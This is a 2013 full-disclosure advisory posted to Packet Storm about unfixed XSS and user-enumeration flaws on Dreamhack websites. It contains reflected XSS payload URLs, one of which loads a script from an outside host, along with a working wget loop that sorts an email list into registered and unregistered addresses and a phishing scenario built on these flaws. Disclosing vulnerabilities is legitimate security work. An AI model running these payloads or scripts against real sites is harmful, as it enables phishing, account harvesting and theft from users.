Dreamhack XSS / User Enumeration

2013-06-16T00:00:00
ID PACKETSTORM:122038
Type packetstorm
Reporter Klondike
Modified 2013-06-16T00:00:00

Description

                                        
                                            `Hi guys!  
  
After various months persuading the guys at Dreamhack to fix a series of  
issues in their websites without success I have decided to publish the  
vulnerabilities in the hope the comunity will be aware of them an avoid  
them. The date was chosen because today it's the opening of the  
Dreamhack Summer edition. For those of you not knowing Dreamhack is the  
biggest Lan Party in the world holding the World record of individual  
devices connected to the network.  
  
Going a little back forward some time ago I found two blind SQL  
injections on the ticket vending site. These were fixed promptly, I  
suppose because of the severity of them. By the end of november I had  
found most of the issues disclosed on this e-mail, but despite notifying  
them repeatedly they haven't fixed them nor shown any willingness to do  
so hence this publication. The issues cover mainly XSS injections and  
user enumerations.  
  
For those with less knowledge, an XSS injection is an attack where HTML  
code is injected in the target page, this is dangerous since arbitrary  
javascript code can be run then to completely modify the web page or to  
steal authentication data from unprotected cookies. An user enumeration  
is an attack where the attacker can know which users are on the system  
and which aren't. In this particular case we care about the attacker  
knowing which of the e-mails from a list have been registered and which  
aren't by seeing the responses the form gives on each case.  
  
After this explanation, let's start with the attacks:  
  
XSS in http://dreamhack.tv  
It's possible to abuse the search field to inject arbitrary code in the  
webpage since entities aren't scaped. Here are two examples  
http://www.dreamhack.tv/?s=%3Cscript%3Ealert%28%27aaaa%27%29;%3C/script%3E  
http://www.dreamhack.tv/?s=%3Cscript%20src=%22http://klondike.es/d.js%22%3E%3C/script%3E  
the last one was used to show the severity of the issue to Robert Ohlén,  
Dreamhack CEO. Despite this the issue remains unfixed to date.  
  
Permanent XSS in https://crew.dreamhack.se  
It's possible to abuse the address profile field (and maybe others) to  
inject arbitrary code, an example can be found in  
https://crew.dreamhack.se/users/eviltons.htm (you'll need to be  
registrered on the system to see it). This is very dangerous since these  
can't be filtered by browsers.  
  
Permanent XSS in https://dreamhack.netadmin.se/cw/main/home.aspx  
This is an internal portal where users can see statistics on their  
traffic and compete for achievements, the users with more achievements  
are marked as so. This is basically a showcase of netadmin's traffic  
analysis stuff. This system had (and may still have) a permanent XSS  
injection in the nick field used for registering which could even affect  
the whole system if the unescaped code is shown in the top users. Since  
this network is closed, the an image can be found at  
http://img94.imageshack.us/img94/4499/jvl.png  
  
User enumeration in http://bokning.dreamhack.se/  
There is also a user enumeration on the forgot password field in the  
booking system where tickets are bought. This can be used to guess which  
users are registered either to send them more spam or to make a combined  
attack using the previous XSS or other fishing methods. In the web there  
are two of these attacks:  
  
The first one (and the simplest to exploit) is at  
http://bokning.dreamhack.se/?p=forgot_pass Below is a simple bash script  
that will filter the e-mails from a list that are not registered.  
while read i; do e="$(echo $i|sed -e 's/+/%2B/g' -e 's/@/%40/g')"; wget  
http://bokning.dreamhack.se/admin/admin.php  
--referer="http://bokning.dreamhack.se/?p=forgot_pass" -q  
--post-data="action=forgot_password&p=users&email=$e" -O- | tee lol.html  
| fgrep "Kunde inte skicka lösenord. Emailen fanns inte." >  
/dev/null || echo $i; done  
  
A similar attack can be exploited on  
http://bokning.dreamhack.se/?p=register in this case e.mails would be  
sent to the users not registered on the system.  
  
Finally it is possible to enumerate the users on the system since the  
sequence numbers used for id are easy to guess, see  
http://bokning.dreamhack.se/index.php?p=profile&id=1 (this parameter is  
usually increased by one and no data is shown if the user is not in the  
database for example:  
http://bokning.dreamhack.se/index.php?p=profile&id=63377  
http://bokning.dreamhack.se/index.php?p=profile&id=63378 and  
http://bokning.dreamhack.se/index.php?p=profile&id=63379 or an invalid  
user http://bokning.dreamhack.se/index.php?p=profile&id=200000 This  
attack isn't that serious though and I didn't care about writting a  
better PoC.  
  
So many may ask if I can provide a practical usage case of these  
attacks. I certainly can, the attacker would use any of the e-mail  
enumeration attacks (probably the forgoten password one) to filter his  
e-mail lists making a new list of users interested in Dreamhack. After  
some time the attacker could then send phisin e-mails offering discount  
tickets to these users with a link to one of the XSS affected sites  
which could then be used to either steal his Credit Card information or  
do fraudulent operations by selling non existent tickets.  
  
There are of course a few good practices that can be followed to protect  
yourself from some of these attacks. The first on is not following any  
link to the affected sites to prevent XSS loads from acting. The second  
is using tagged e-mails (if you e-mail supports them) when you register  
in a web so user enumerations are harder to do, for example you could  
register as nick+tag@example.com  
  
Little more to say for now.  
See ya!  
Klondike  
  
`